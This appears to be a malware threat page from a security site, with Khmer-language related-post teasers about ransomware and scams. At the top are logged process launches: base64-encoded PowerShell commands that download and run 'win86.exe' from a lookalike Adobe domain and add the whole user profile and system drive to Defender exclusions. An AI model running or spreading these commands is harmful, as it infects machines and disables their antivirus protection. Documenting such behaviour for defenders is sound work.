open powershell -EncodedCommand "PAAjAHQAegBsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQBoAGUAbABwAC4AbgBlAHQALwB3AGkAbgA4ADYALgBlAHgAZQAnACwAIAA8ACMAegBhAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGwAZAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHMAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB3AGkAbgA4ADYALgBlAHgAZQAnACkAKQA8ACMAaAB6AHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgBjAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAcgB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHcAaQBuADgANgAuAGUAeABlACcAKQA8ACMAbgB2AG0AIwA+AA=="
open powershell -EncodedCommand "PAAjAGsAYwBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAcwBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAZABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAdABlACMAPgA="
open C:\Users\Qoceadrm\AppData\Local\Temp\Album_TD_3-8-0_Activation.exe
open C:\Users\Qoceadrm\AppData\Local\Temp\ttrj.exe

ប្រកាសដែលពាក់ព័ន្ធ

CyberHazard Ransomware

Ransomware
Ransomware គឺជាទម្រង់បំផ្លិចបំផ្លាញបំផុតនៃឧក្រិដ្ឋកម្មតាមអ៊ីនធឺណិត។ ការវាយប្រហារទាំងនេះអាចបណ្តាលឱ្យបាត់បង់ទិន្នន័យធ្ងន់ធ្ងរ ការរំខានប្រតិបត្តិការ និងការខូចខាតផ្នែកហិរញ្ញវត្ថុ។ CyberHazard...
រូបថតអេក្រង់ នាយកប្រតិបត្តិ Cybersecurity...

នាយកប្រតិបត្តិ Cybersecurity...

សុវត្ថិភាពកុំព្យូទ័រ
នៅក្នុងការរំលោភលើទំនុកចិត្តដ៏គួរឱ្យភ្ញាក់ផ្អើលដែលបង្ហាញពីការកើនឡើងនៃការគំរាមកំហែងនៃការវាយប្រហារខាងក្នុង នាយកប្រតិបត្តិនៃក្រុមហ៊ុនសន្តិសុខតាមអ៊ីនធឺណិតត្រូវបានចាប់ខ្លួនដោយចោទប្រកាន់ថាបានដំឡើង មេរោគ...

Cybertron Ransomware

Ransomware
នៅពេលដែលការវាយប្រហារតាមអ៊ីនធឺណេតកើនឡើងកាន់តែខ្លាំង និងធ្វើឱ្យខូចខាត វាមានសារៈសំខាន់ជាងពេលណាទាំងអស់សម្រាប់អ្នកប្រើប្រាស់ និងអង្គការនានាក្នុងការធានាបរិស្ថានឌីជីថលរបស់ពួកគេ។...

UNC3886 Cyber Espionage Group

មេរោគ, ទ្វារក្រោយ
អង្គភាពចារកម្មអ៊ីនធឺណេតដែលភ្ជាប់ជាមួយប្រទេសចិន UNC3886 បាននិងកំពុងកំណត់គោលដៅយ៉ាងសកម្មទៅលើរ៉ោតទ័រ MX ចុងក្រោយបង្អស់ ដើម្បីដាក់ពង្រាយ backdoors ផ្ទាល់ខ្លួន។...

CyberVolk BlackEye Ransomware

Ransomware
នៅពេលដែលយុគសម័យឌីជីថលបន្តវិវឌ្ឍ ដូច្នេះសូមធ្វើការគំរាមកំហែងដែលលាក់ខ្លួននៅក្រោមផ្ទៃរបស់វា។ ក្នុងចំណោមគ្រោះថ្នាក់បំផុតនៃការគំរាមកំហែងទាំងនេះគឺ ransomware...
រូបថតអេក្រង់ DeepSeek Security Breach លាតត្រដាងភាពងាយរងគ្រោះ AI...

DeepSeek Security Breach លាតត្រដាងភាពងាយរងគ្រោះ AI...

សុវត្ថិភាពកុំព្យូទ័រ
AI ជំនាន់ចុងក្រោយបង្អស់របស់ប្រទេសចិន DeepSeek គឺជាកម្មវត្ថុនៃការត្រួតពិនិត្យសន្តិសុខតាមអ៊ីនធឺណិតយ៉ាងខ្លាំងក្លាចាប់តាំងពីការបើកដំណើរការ។ ថ្មីៗនេះ...

និន្នាការ

ផ្នែកបន្ថែមកម្មវិធីរុករកវាលផ្កាយ

កម្មវិធីដែលមិនចង់បានសក្តានុពល, ចោរប្លន់កម្មវិធីរុករក
អ្នកស្រាវជ្រាវ Infosec បានរកឃើញ Star Field ដែលជាផ្នែកបន្ថែមរបស់កម្មវិធីរុករកតាមអ៊ីនធឺណិត កំឡុងពេលពិនិត្យមើលគេហទំព័របោកប្រាស់របស់ពួកគេ។...

លួច (MediusaLocker) Ransomware

Ransomware
ជាមួយនឹងការវិវត្តន៍យ៉ាងឆាប់រហ័សនៃការគំរាមកំហែងតាមប្រព័ន្ធឌីជីថល ransomware នៅតែជាទម្រង់មួយនៃការបំផ្លិចបំផ្លាញ និងមានតម្លៃថ្លៃបំផុតនៃឧក្រិដ្ឋកម្មតាមអ៊ីនធឺណិត។...

មើលច្រើនបំផុត

មេរោគ

ការបន្លំ, សារឥតបានការ
31,813
សារបោកប្រាស់ 'Apple Pay Suspended' គឺជាប្រភេទនៃល្បិចបន្លំដែលកំណត់គោលដៅអ្នកប្រើប្រាស់ Apple Pay ។ សារនេះបានអះអាងថាកាបូប Apple Pay របស់អ្នកប្រើប្រាស់ត្រូវបានផ្អាក និងជំរុញឱ្យពួកគេចុចតំណដើម្បីស្ដារវាឡើងវិញ។ ទោះជាយ៉ាងណាក៏ដោយ ការចុចលើតំណភ្ជាប់នឹងនាំអ្នកប្រើប្រាស់ទៅកាន់គេហទំព័រក្លែងក្លាយដែលត្រូវបានរចនាឡើងដើម្បីលួចព័ត៌មានផ្ទាល់ខ្លួន និងហិរញ្ញវត្ថុរបស់ពួកគេ។...

Fuq.com

កម្មវិធីប្រឆាំង Spyware Rogue, មេរោគ Mac
22,852
Fuq.com គឺជាកម្មវិធីប្រភេទ Adware ដែលផ្សព្វផ្សាយគេហទំព័រដែលមានខ្លឹមសារអាសអាភាស។ យុទ្ធនាការផ្សាយពាណិជ្ជកម្មនៃកម្មវិធីដែលមិនចង់បានសក្តានុពល (PUP) នេះគឺឈ្លានពានខ្លាំងណាស់។...
កំពុង​ផ្ទុក...